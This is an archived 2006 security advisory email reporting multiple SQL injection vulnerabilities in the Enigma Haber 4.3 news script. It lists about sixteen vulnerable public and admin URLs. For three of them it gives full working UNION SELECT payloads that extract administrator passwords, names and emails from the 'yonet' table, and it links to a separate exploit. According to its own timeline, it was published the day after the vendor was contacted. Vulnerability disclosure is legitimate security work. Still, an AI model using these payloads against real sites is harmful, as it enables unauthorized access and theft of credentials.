Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY LINKS NEWS MAN DOCUMENTATION

<< Previous INDEX Search src / Print Next >>

Date: Sun, 28 May 2006 16:58:56 +0300
From: Mustafa Can Bjorn IPEKCI <nukedx@nukedx.com.>
To: [email protected], [email protected],
Subject: Advisory: Enigma Haber <= 4.3 Multiple Remote SQL Injection
        Vulnerabilities
MIME-Version: 1.0
Content-Type: text/plain;
        charset=ISO-8859-9;
        DelSp="Yes";
        format="flowed"
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
User-Agent: Internet Messaging Program (IMP) H3 (4.1)
X-Virus-Scanned: antivirus-gw at tyumen.ru


--Security Report--
Advisory: Enigma Haber <=3D 4.3 Multiple Remote SQL Injection Vulnerabilitie=
s
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 27/05/06 05:16 PM
---
Contacts:{
ICQ: 10072
MSN/Email: [email protected]
Web: http://www.nukedx.com
}
---
Vendor: EnigmaASP (http://www.enigmaasp.net/)
Version: 4.3 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL =20
queries to EnigmaHaber.See the examples.
Level: Critical
---
How&Example:
GET -> http://&#091;site]/enigmadir/e_mesaj_yaz.asp?id=3DSQL
EXAMPLE -> =20
http://[site]/enigmadir/e_mesaj_yaz.asp?id=3D1879586820+UNION+SELECT+0,sifre=
,2,3,4,5,6,7,8,9,10,110,0,
0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+yonet+where+yonetid=3D1144931586
GET -> http://&#091;site]/enigmadir/yazdir.asp?hid=3DSQL
GET -> http://&#091;site]/enigmadir/yorum.asp?hid=3DSQL
GET -> http://&#091;site]/enigmadir/edi_haber.asp?id=3DSQL&tur=3D1
GET -> =20
http://[site]/enigmadir/ara.asp?yo=3D1&ara=3DSQL&ko=3D0&k=3D0&d=3Dhid&e=3Dde=
sc&ay=3D00&yil=3D00
GET -> =20
http://[site]/enigmadir/arsiv.asp?d=3Dhid&e=3Ddesc[SQL]&ay=3D00&yil=3D00&e_k=
ad=3D00
EXAMPLE -> =20
http://[site]/enigmadir/arsiv.asp?d=3Dhid&e=3Ddesc+UNION+SELECT+0,sifre,isim=
,3,4,5,6,7,8,9,10,11,12,13,14,
15,16,17,18,19+FROM+yonet+where+yonetid%20like%201144927664&ay=3D00&yil=3D00=
&e_kad=3D00
GET -> http://&#091;site]/enigmadir/haber_devam.asp?id=3DSQL
Examples in the below needs admin rights.
GET -> http://&#091;site]/enigmadir/admin/y_admin.asp?yid=3DSQL
EXAMPLE -> =20
http://[site]/enigmadir/admin/y_admin.asp?yid=3D34+UNION+SELECT+0,1,mail,3,4=
,5,sifre,isim,8,9,sehir+from+
yonet+where+yonetid=3D1144927664
GET -> http://&#091;site]/enigmadir/admin/reklam_detay.asp?bid=3DSQL
GET -> http://&#091;site]/enigmadir/admin/detay_yorum.asp?hid=3DSQL
GET -> http://&#091;site]/enigmadir/admin/haber_sil.asp?hid=3DSQL
GET -> http://&#091;site]/enigmadir/admin/kategori_d.asp?o=3D1&kid=3DSQL
GET -> http://&#091;site]/enigmadir/admin/haber_ekle.asp?tur=3DSQL
GET -> http://&#091;site]/enigmadir/admin/e_mesaj_yaz.asp?s=3DSQL
GET -> http://&#091;site]/enigmadir/admin/admin_sil.asp?id=3DSQL
--
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted with vendor and waiting reply.
---
Exploit: http://www.nukedx.com/?getxpl=3D34
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=3D34

<< Previous INDEX Search src / Print Next >>

Партнёры:

Хостинг: